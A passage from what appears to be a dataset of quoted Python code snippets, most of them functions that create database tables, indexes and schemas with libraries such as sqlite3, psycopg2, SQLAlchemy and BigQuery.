self.interface.drop_table(_history_stats_table)\n self.interface.create_table(_history_table)\n self.interface.create_index('index1', _history_table, [_history_table['timestamp']])\n self.interface.create_table(_history_stats_table)\n self.interface.create_index('index2', _history_stats_table, [_history_stats_table['benchmark']])\n self.interface.commit_transaction()", "def bd_createTable(self, _c):\n\n _c.execute('CREATE TABLE IF NOT EXISTS package (id TEXT, num INT, desc TEXT, status TEXT, source_env TEXT, dest_env TEXT, app TEXT, last_rev TEXT)')", "def _create_intermediate_delta_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {blacklist_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname),\n blacklist_delta_tbl=sql.Identifier(self._blacklist_tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_delta_tblname\n notifications_delta_tbl = sql.Identifier(self._notifications_lists_tblname)\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {notifications_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n notifications_delta_tbl=notifications_delta_tbl))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n 
parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_delta_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {exceptions_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n exceptions_delta_tbl=sql.Identifier(self._exceptions_lists_tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_delta_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def create_tables (cls, env=os.environ):\n\n cur = cls.pri_table_read_cursor (env=env)\n cur.execute ('SPECIALCASE gettablelist')\n ret = cur.fetchall ()\n \n existingtables = set ([x[0].lower() for x in ret])\n\n for tabname in (set (cls.table_desc.keys ()) - existingtables):\n sql, lsd = cls.table_desc[tabname]\n epls, desls, sqlprefix = lsd.get_create_labeling (savels=True)\n\n conn = get_labeled_conn (epls, desls)\n cur = conn.cursor ()\n cur.execute (sql)\n conn.close ()\n lsd.pop_labelset ()\n\n \n import psycopg2\n for sql in cls.sql_createindex:\n conn = get_labeled_conn ()\n cur = conn.cursor ()\n # XXX It would be better to check which indices exist as we do for tables.\n try:\n cur.execute (sql)\n except psycopg2.ProgrammingError, e: \n pass\n conn.close ()", "def create_database_tables():\n with APP.app_context():\n DB.create_all()", "def create_tables(self):\n con = self.connect()\n cursor = con.cursor()\n queries = self.tables()\n for query in queries:\n cursor.execute(query)\n cursor.close()\n con.commit()\n con.close()", "def create_all_tables(self):\n pass", "def _create(self):\n with self.pdq:\n c=self.pdq.cursor() \n c.execute('CREATE TABLE pdq (item blob,priority int)')\n c.execute('CREATE INDEX priority_index ON pdq (priority)')", "def createTables(self,table=\"all\"):\n auto=\"\"\n\tif self.dbType==\"mysql\":\n\t auto=\"AUTO_INCREMENT\"\n\t \n\ttableName=\"FileID\"\n if table==\"all\" or table==tableName:\n\t # Drop/create FileID table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"CREATE TABLE %s (\n\t fileid %s %s PRIMARY KEY, \n\t fileName TEXT,\n\t typeid %s\n\t )\n\t \"\"\"%(tableName,self.long,auto,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"KeyFile\"\n\tif table==\"all\" or table==tableName: \n\t # Drop/create KeyFile table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t graphid %s NOT NULL, \n\t view VARCHAR(255) NOT NULL, \n\t run %s NOT NULL, \n\t uid %s, \n\t keyFileId %s NOT NULL, PRIMARY KEY(graphid,view,run,uid) )\n\t \"\"\"%(tableName,self.UINT,self.UINT,self.uid,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\t\n\ttableName=\"RunUID\"\n if table==\"all\" or table==tableName:\n\t # Drop/create RunUID table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t run %s NOT NULL,\n\t uid %s )\n\t \"\"\"%(tableName,self.UINT,self.uid)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t 
self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"MaxMasterID\"\n if table==tableName:\n\t # Drop/create RunUID table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t masterMaxId %s NOT NULL,\n\t comment TEXT )\n\t \"\"\"%(tableName,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"Location\"\n if table==\"all\" or table==tableName:\n\t # Drop/create Localtion table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t id %s %s PRIMARY KEY,\n\t graphid %s NOT NULL, \n\t run %s NOT NULL, \n\t uid %s, \n\t locationFileId %s NOT NULL )\n\t \"\"\"%(tableName,self.long,auto,self.UINT,self.UINT,self.uid,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t query = \"CREATE INDEX LocationGroups ON Location(graphid,run,uid)\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"Version\"\n if table==\"all\" or table==tableName:\n\t # Drop/create Version table in SQLDB.EventStoreDB\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t id %s %s PRIMARY KEY,\n\t grade VARCHAR(255) NOT NULL, \n\t timeStamp %s NOT NULL, \n\t minRunNumber %s NOT NULL, \n\t maxRunNumber %s NOT NULL, \n\t graphid %s NOT NULL,\n\t state VARCHAR(10) ) \n\t \"\"\"%(tableName,self.long,auto,self.UINT,self.UINT,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"SpecificVersion\"\n if table==\"all\" or table==tableName:\n\t # Drop/create SpecificVersion table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t svName VARCHAR(255) NOT NULL PRIMARY KEY, \n\t svid %s NOT NULL )\n\t \"\"\"%(tableName,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"SpecificVersionComment\"\n if table==\"all\" or table==tableName:\n\t # Drop/create SpecificVersionComment table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t id %s %s NOT NULL PRIMARY KEY,\n\t svid %s NOT NULL,\n\t CommentDate %s,\n\t Comment TEXT )\n\t \"\"\"%(tableName,self.UINT,auto,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"GraphPath\"\n if table==\"all\" or table==tableName:\n\t # Drop/create GraphPath table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t graphid %s NOT NULL PRIMARY KEY, \n\t svid %s NOT NULL )\n\t \"\"\"%(tableName,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"PathDepend\"\n if table==\"all\" or table==tableName:\n\t # Drop/create GraphPath table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t parentId %s, 
\n\t childId %s NOT NULL )\n\t \"\"\"%(tableName,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"FileType\"\n if table==\"all\" or table==tableName: \n\t # Drop/create FileType table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"CREATE TABLE %s (\n\t id %s %s PRIMARY KEY, \n\t type VARCHAR(8) NOT NULL,\n\t description TEXT )\n\t \"\"\"%(tableName,self.UINT,auto)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\t\n\ttableName=\"OrphanFileID\"\n if table==\"all\" or table==tableName:\n\t # Drop/create FileType table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"CREATE TABLE %s (\n\t id %s PRIMARY KEY, \n\t dateTime DATETIME,\n\t user VARCHAR(8) NOT NULL )\n\t \"\"\"%(tableName,self.long)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query", "def create_table(user_id: int, jap_event_id: int) -> Table:\n table = Table(emperor=user_id,\n jap_event_id=jap_event_id,\n status=0)\n\n member = User.query.filter(User.id.__eq__(user_id)).first()\n table.members.append(member)\n\n db.session.add(table)\n db.session.commit()\n\n table_id = table.id\n command = CommandService.create_command(1, table_id)\n table.current_command_id = command.id\n\n db.session.add(table, command)\n db.session.commit()\n return table", "def createTable(self):\n results = self.db.table_create(self.entity).run(self.r)\n time.sleep(5)\n return results", "def create_table(self, conn, create_table_sql):\n try:\n # create a Cursor object and call its .execute() method to perform SQL queries\n c = conn.cursor()\n # execute SQL queries: create a table named card\n c.execute(create_table_sql)\n except Error as e:\n print(e)", "def test_create_container(self):\n pass", "def create_table(opts, stats):\n print(\"--------------------------------------\")\n print(\"Creating table %s\" % (opts.table_name,))\n print(\"--------------------------------------\")\n print(timestamp())\n create_table_ddl = \"CREATE TABLE %s (\" % (opts.table_name,)\n num_bigint_cols = opts.columns - opts.num_string_columns\n assert(num_bigint_cols > 0)\n for i in range(opts.columns):\n coltype = 'STRING'\n if i < num_bigint_cols: coltype = 'BIGINT'\n if i > 0: create_table_ddl += ', '\n create_table_ddl += \"f%d %s\" % (i, coltype)\n if i == 0: create_table_ddl += ' PRIMARY KEY'\n create_table_ddl += \") PARTITION BY HASH(f0) PARTITIONS %d STORED AS KUDU \" % \\\n (opts.partitions, )\n create_table_ddl += \"TBLPROPERTIES ('kudu.num_tablet_replicas' = '%d')\" % \\\n (opts.replication_factor, )\n\n cmd = 'echo \"%s\" | impala-shell -i %s -f -' % (create_table_ddl, opts.impalad_address)\n run_command(opts, cmd)", "def create_tables(self):\n for query in table_create_sql:\n self.cursor.execute(query)\n\n self.commit()", "def create_layers_table():\n\n table_name = f\"{BQ_LAYERS_TABLE}\"", "def _get_db_create_table(self, frame):\r\n\r\n columns = (u',\\n'.\r\n\r\n join([u' `%s` DECIMAL(20,5) DEFAULT NULL COMMENT \"%s\"' %\r\n\r\n (self._get_db_name(name), name) for name in\r\n\r\n frame.index.values]))\r\n\r\n table_name = self._get_db_table_name(frame)\r\n\r\n return (\r\n\r\n u'CREATE TABLE `%s` (\\n' % table_name +\r\n\r\n u' 
`ticker` VARCHAR(50) NOT NULL COMMENT \"Exchange:Ticker\",\\n' +\r\n\r\n u' `period` DATE NOT NULL COMMENT \"Period\",\\n' +\r\n\r\n u'%s,\\n' % columns +\r\n\r\n u' PRIMARY KEY USING BTREE (`ticker`, `period`),\\n' +\r\n\r\n u' KEY `ix_ticker` USING BTREE (`ticker`))\\n' +\r\n\r\n u'ENGINE=MyISAM DEFAULT CHARSET=utf8\\n' +\r\n\r\n u'COMMENT = \"%s\"' % frame.index.name)", "def __create_table(self):\n\n self.connection = self.db.connect()\n self.metadata = MetaData(self.connection)\n\n self.system = Table(self.table_name, self.metadata,\n Column('timestamp', DateTime(), primary_key=True, nullable=False),\n Column('vibration_sensor', Float()),\n Column('flow', Float()),\n Column('pressure', Float()),\n Column('power_consumption', Float()),\n Column('failure_times', Float()),\n Column('operational', Boolean())\n )\n\n self.metadata.create_all()", "def prespi_AccountBroker_initialize(self, conn, put_timestamp, **kwargs):\n if not self.account:\n raise ValueError(\n 'Attempting to create a new database with no account set')\n self.create_container_table(conn)\n self.create_account_stat_table(conn, put_timestamp)", "def __create_recentconn_table(self):\r\n QtSql.QSqlQuery('''CREATE TABLE IF NOT EXISTS recentconn\r\n (host varchar(255),\r\n port int,\r\n passphrase varchar(255),\r\n UNIQUE (host, port) ON CONFLICT REPLACE)''')", "def create_table():\n sql = sqlite3.connect('data.db')\n cursor = sql.cursor()\n logging.debug(\"Successfully Connected to SQLite\")\n\n cursor.execute(\n '''CREATE TABLE Status\n ([ip] text, [port] integer, [count_requests] integer, [t_start] integer, [protocol] text)'''\n )\n\n cursor.close()", "def _create_table(self):\n query = f\"\"\"CREATE TABLE IF NOT EXISTS {TABLE}(\n member_Id INT,\n memberName VARCHAR(50),\n amount INT,\n date datetime NOT NULL,\n time datetime NOT NULL,\n status VARCHAR(20) NOT NULL DEFAULT 'Completed'\n );\"\"\"\n\n self.cursor.execute(query)\n self.conn.commit()", "def create_new_table():\n dataset = create_dataset()\n table_id = \"{}.{}.corona_cases_table\".format(client.project, dataset.dataset_id)\n table = bigquery.Table(table_id)\n table = client.create_table(table, exists_ok=True)\n print(\n \"Created table {}.{}.{}\".format(table.project, table.dataset_id, table.table_id)\n )\n return table", "async def create_sys_tables(self) -> None:\n await self.conn.execute(\"\"\"CREATE TABLE IF NOT EXISTS tinymud_migrations (\n table_name TEXT,\n level INTEGER\n )\"\"\")", "def db_create_table(db_in, tablename):\n connection = db_in.connection.cursor()\n connection.execute('CREATE TABLE IF NOT EXISTS %s(id INTEGER PRIMARY KEY);' % tablename)", "def create_tables():\n db.create_all()", "def create_tables():\n db.create_all()", "def create_table(self):\n logging.debug('Creating new table')\n if not self._dbconnect or not self._cursor:\n raise Exception('Invalid call to Context Manager method!')\n\n self._cursor.execute(\"create table {} (date text, time text, location text, nodeID text)\".format(self._name))", "def init_tables(self):\n\n settings.Base.metadata.tables[\n 'session_master'].drop(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].drop(bind=settings.engine)\n\n settings.Base.metadata.tables[\n 'session_master'].create(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].create(bind=settings.engine)\n\n logging.info(\"Sessionization Tables created\")", "def _create_schema(self):\n self._conn.executescript(self._db_schema)", "def _CreateTable(db_conn, create_table_sql):\r\n try:\r\n c = db_conn.cursor()\r\n 
c.execute(create_table_sql)\r\n except Error as e:\r\n print(e)", "def create_tables():\n db.create_all()", "def create(self, table, columns, types, primary_key_index=[], is_ifnotexists=True):\n\n self.lock.acquire()\n try:\n dblist = self.client.get_list_database()\n for dbdict in dblist:\n if self.dbname in dbdict[\"name\"]:\n self.lock.release()\n return True\n\n self.client.create_database(self.dbname)\n except Exception as e:\n raise Exception(\"Error in create statement; InfluxDb, DB=%s\\n\" % self.dbname)\n\n self.lock.release()\n\n return True", "def create_table1():\n connection = connect(\n host=\"localhost\",\n user=\"postgres\",\n password=\"coderslab\",\n database=f\"{name + '_db'}\"\n )\n connection.autocommit = True\n cursor = connection.cursor()\n sql_code2 = \"CREATE TABLE users(id serial PRIMARY KEY, username varchar(255) UNIQUE, hashed_password varchar(80)) \"\n cursor.execute(sql_code2)\n return \"Creating table users...\"", "def _init_db(self):\n cursor = self._main_connection.cursor()\n cursor.execute(self.sql[\"create_table\"])\n self._main_connection.commit()", "def _create_tables():\n from Model.DataAccessor.DbAccessor.DbOrmAccessor import db\n db.create_tables([SubjectType, SubjectRegion, Subject])", "def create_database():\n DB_NAME = 'cloud_storage.db'\n DB_DIRECTORY = 'server_side_storage/'\n db = sqlite3.connect('{}/{}'.format(DB_DIRECTORY, DB_NAME))\n cursor = db.cursor()\n cursor.execute('''CREATE TABLE user_ids\n (row_id INTEGER PRIMARY KEY AUTOINCREMENT, uid TEXT, user_table_name TEXT)''')\n db.commit()\n cursor.close()\n db.close()", "def create_marker_table(self):\n if self.marker_table is None:\n self.marker_table = luigi.configuration.get_config().get('sqlalchemy', 'marker-table', 'table_updates')\n\n engine = self.engine\n\n with engine.begin() as con:\n metadata = sqlalchemy.MetaData()\n if not con.dialect.has_table(con, self.marker_table):\n self.marker_table_bound = sqlalchemy.Table(\n self.marker_table, metadata,\n sqlalchemy.Column(\"ParquetSource\", sqlalchemy.String(128), primary_key=True),\n sqlalchemy.Column(\"TargetTable\", sqlalchemy.String(128)),\n sqlalchemy.Column(\"Environment\", sqlalchemy.String(128)),\n sqlalchemy.Column(\"BackupDate\", sqlalchemy.DateTime),\n sqlalchemy.Column(\"InsertedDate\", sqlalchemy.DateTime, default=datetime.now()))\n metadata.create_all(engine)\n else:\n metadata.reflect(only=[self.marker_table], bind=engine)\n self.marker_table_bound = metadata.tables[self.marker_table]", "def create_all_tables():\n\tcommon_db.create_all_tables()", "def initialize_tables(database_connection_object, logger):\n\n try:\n cmd = \"\"\"\n create table if not exists `services_fingerprint_table` (\n target varchar(20),\n port int,\n name varchar(20),\n version varchar(500))\n \"\"\"\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n database_connection_object.cursor().execute(cmd)\n\n except ProgrammingError as programming_error:\n logger.error(programming_error)\n\n except pymysql.err.Warning as pymysql_warning:\n logger.error(pymysql_warning)", "def sql_create_big_table():\n return \"\"\"\n SELECT\n m.tube_assembly_id as 'tube_assembly_id'\n , m.quantity_1 as 'quantity_component'\n , c.component_id \n , c.component_type_id \n , c.type as component_type \n , c.connection_type_id\n , c.outside_shape\n , c.base_type\n , c.height_over_tube\n , c.bolt_pattern_long\n , c.bolt_pattern_wide\n , c.groove\n , c.base_diameter\n , c.shoulder_diameter\n , c.unique_feature\n , c.orientation\n , c.weight\n , p.supplier\n , 
p.quote_date\n , p.annual_usage\n , p.min_order_quantity\n , p.bracket_pricing\n , p.quantity\n , p.cost\n FROM\n stg_bill_of_materials m INNER JOIN stg_comp_boss c\n ON m.component_id_1 = c.component_id\n \n INNER JOIN stg_price_quote p\n ON m.tube_assembly_id = p.tube_assembly_id\n \"\"\"", "def create_new_index(self, dict_pg_info):\n # ! Setting if fun can use default setting\n ruler = Rules()\n str_conn = ruler.pg_info_rules(dict_pg_info)\n conn = psycopg2.connect(str_conn)\n\n with conn:\n with conn.cursor() as cur:\n str_create_table = \"CREATE TABLE \" + dict_pg_info['table'] + \" (path varchar PRIMARY KEY);\"\n # ! Check if table already exit\n cur.execute(str_create_table)\n cur.close()\n\n conn.close()", "def create_tables(cur, conn):\n for query in create_table_queries:\n cur.execute(query)\n conn.commit()\n \n print('Tables created.')", "def create_fact_tables(cur,conn):\n\tfor query in create_fact_queries:\n\t\tcur.execute(query)\n\t\tconn.commit()", "def createTables():\n conn = getConnection()\n try:\n cur = conn.cursor()\n for table, query in tables.items():\n cur.execute(query)\n conn.commit()\n except Exception as ex:\n print(\"Failed to create tables:\" )\n print(ex)\n sys.exit(1)", "def create_db_structure(self):\n logger.info(\"Creating CRH database structure.\")\n CrhDbModel.metadata.create_all(bind=self.engine)", "def create_base(self):\r\n self.mycursor.execute(\r\n 'CREATE DATABASE IF NOT EXISTS purbeurre CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci')\r\n self.mycursor.execute('USE purbeurre')", "def create_schema(self):\n schema = '''CREATE TABLE jping (\n ip_address text not null,\n interface text not null,\n hostname text not null,\n ping_results integer not null,\n UNIQUE(ip_address, hostname)\n )\n '''\n self.query(schema)", "def create_new_user_table():\n # Connect to database\n conn = psycopg2.connect(DATABASE_URL, sslmode='require')\n # Open a cursor to perform db operations\n cur = conn.cursor()\n # Create the table\n cur.execute(\"\"\"\n CREATE TABLE test (\n user_id int NOT NULL PRIMARY KEY,\n username varchar(255),\n id_last_message_sent int,\n id_last_message_stickered int,\n count_since_last_stickered int\n );\n \"\"\"\n )\n # Commit and close connection\n conn.commit()\n cur.close()\n conn.close()", "def build_metadata():\n metadata = sa.MetaData()\n\n sa.Table(\n 'hive_blocks', metadata,\n sa.Column('num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('hash', CHAR(40), nullable=False),\n sa.Column('prev', CHAR(40)),\n sa.Column('txs', SMALLINT, server_default='0', nullable=False),\n sa.Column('ops', SMALLINT, server_default='0', nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('hash', name='hive_blocks_ux1'),\n sa.ForeignKeyConstraint(['prev'], ['hive_blocks.hash'], name='hive_blocks_fk1'),\n )\n\n sa.Table(\n 'hive_accounts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('name', VARCHAR(16), nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n #sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('reputation', sa.Float(precision=6), nullable=False, server_default='25'),\n\n sa.Column('display_name', sa.String(20)),\n sa.Column('about', sa.String(160)),\n sa.Column('location', sa.String(30)),\n sa.Column('website', sa.String(100)),\n sa.Column('profile_image', sa.String(1024), nullable=False, server_default=''),\n sa.Column('cover_image', sa.String(1024), nullable=False, server_default=''),\n\n sa.Column('followers', 
sa.Integer, nullable=False, server_default='0'),\n sa.Column('following', sa.Integer, nullable=False, server_default='0'),\n\n sa.Column('proxy', VARCHAR(16), nullable=False, server_default=''),\n sa.Column('post_count', sa.Integer, nullable=False, server_default='0'),\n sa.Column('proxy_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('vote_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('kb_used', sa.Integer, nullable=False, server_default='0'), # deprecated\n sa.Column('rank', sa.Integer, nullable=False, server_default='0'),\n\n sa.Column('lastread_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('active_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('cached_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('raw_json', sa.Text),\n\n\n sa.UniqueConstraint('name', name='hive_accounts_ux1'),\n sa.Index('hive_accounts_ix1', 'vote_weight', 'id'), # core: quick ranks\n sa.Index('hive_accounts_ix2', 'name', 'id'), # core: quick id map\n sa.Index('hive_accounts_ix3', 'vote_weight', 'name', postgresql_ops=dict(name='varchar_pattern_ops')), # API: lookup\n sa.Index('hive_accounts_ix4', 'id', 'name'), # API: quick filter/sort\n sa.Index('hive_accounts_ix5', 'cached_at', 'name'), # core/listen sweep\n )\n\n sa.Table(\n 'hive_posts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('parent_id', sa.Integer),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.Column('depth', SMALLINT, nullable=False),\n sa.Column('is_deleted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_pinned', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_muted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_valid', BOOLEAN, nullable=False, server_default='1'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n\n sa.ForeignKeyConstraint(['author'], ['hive_accounts.name'], name='hive_posts_fk1'),\n sa.ForeignKeyConstraint(['parent_id'], ['hive_posts.id'], name='hive_posts_fk3'),\n sa.UniqueConstraint('author', 'permlink', name='hive_posts_ux1'),\n sa.Index('hive_posts_ix3', 'author', 'depth', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: author blog/comments\n sa.Index('hive_posts_ix4', 'parent_id', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: fetching children\n sa.Index('hive_posts_ix5', 'id', postgresql_where=sql_text(\"is_pinned = '1' AND is_deleted = '0'\")), # API: pinned post status\n sa.Index('hive_posts_ix6', 'community_id', 'id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_pinned = '1' AND is_deleted = '0'\")), # API: community pinned\n )\n\n sa.Table(\n 'hive_post_tags', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('tag', sa.String(32), nullable=False),\n sa.UniqueConstraint('tag', 'post_id', name='hive_post_tags_ux1'), # core\n sa.Index('hive_post_tags_ix1', 'post_id'), # core\n )\n\n sa.Table(\n 'hive_follows', metadata,\n sa.Column('follower', sa.Integer, nullable=False),\n sa.Column('following', sa.Integer, nullable=False),\n sa.Column('state', SMALLINT, nullable=False, server_default='1'),\n sa.Column('created_at', 
sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('following', 'follower', name='hive_follows_ux3'), # core\n sa.Index('hive_follows_ix5a', 'following', 'state', 'created_at', 'follower'),\n sa.Index('hive_follows_ix5b', 'follower', 'state', 'created_at', 'following'),\n )\n\n sa.Table(\n 'hive_reblogs', metadata,\n sa.Column('account', VARCHAR(16), nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.ForeignKeyConstraint(['account'], ['hive_accounts.name'], name='hive_reblogs_fk1'),\n sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_reblogs_fk2'),\n sa.UniqueConstraint('account', 'post_id', name='hive_reblogs_ux1'), # core\n sa.Index('hive_reblogs_ix1', 'post_id', 'account', 'created_at'), # API -- not yet used\n )\n\n sa.Table(\n 'hive_payments', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('tx_idx', SMALLINT, nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('from_account', sa.Integer, nullable=False),\n sa.Column('to_account', sa.Integer, nullable=False),\n sa.Column('amount', sa.types.DECIMAL(10, 3), nullable=False),\n sa.Column('token', VARCHAR(5), nullable=False),\n\n sa.ForeignKeyConstraint(['from_account'], ['hive_accounts.id'], name='hive_payments_fk1'),\n sa.ForeignKeyConstraint(['to_account'], ['hive_accounts.id'], name='hive_payments_fk2'),\n sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_payments_fk3'),\n )\n\n sa.Table(\n 'hive_feed_cache', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('account_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.UniqueConstraint('post_id', 'account_id', name='hive_feed_cache_ux1'), # core\n sa.Index('hive_feed_cache_ix1', 'account_id', 'post_id', 'created_at'), # API (and rebuild?)\n )\n\n sa.Table(\n 'hive_posts_cache', metadata,\n sa.Column('post_id', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n\n # important/index\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('depth', SMALLINT, nullable=False, server_default='0'),\n sa.Column('children', SMALLINT, nullable=False, server_default='0'),\n\n # basic/extended-stats\n sa.Column('author_rep', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('flag_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('total_votes', sa.Integer, nullable=False, server_default='0'),\n sa.Column('up_votes', sa.Integer, nullable=False, server_default='0'),\n\n # basic ui fields\n sa.Column('title', sa.String(255), nullable=False, server_default=''),\n sa.Column('preview', sa.String(1024), nullable=False, server_default=''),\n sa.Column('img_url', sa.String(1024), nullable=False, server_default=''),\n\n # core stats/indexes\n sa.Column('payout', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('created_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('payout_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('updated_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('is_paidout', 
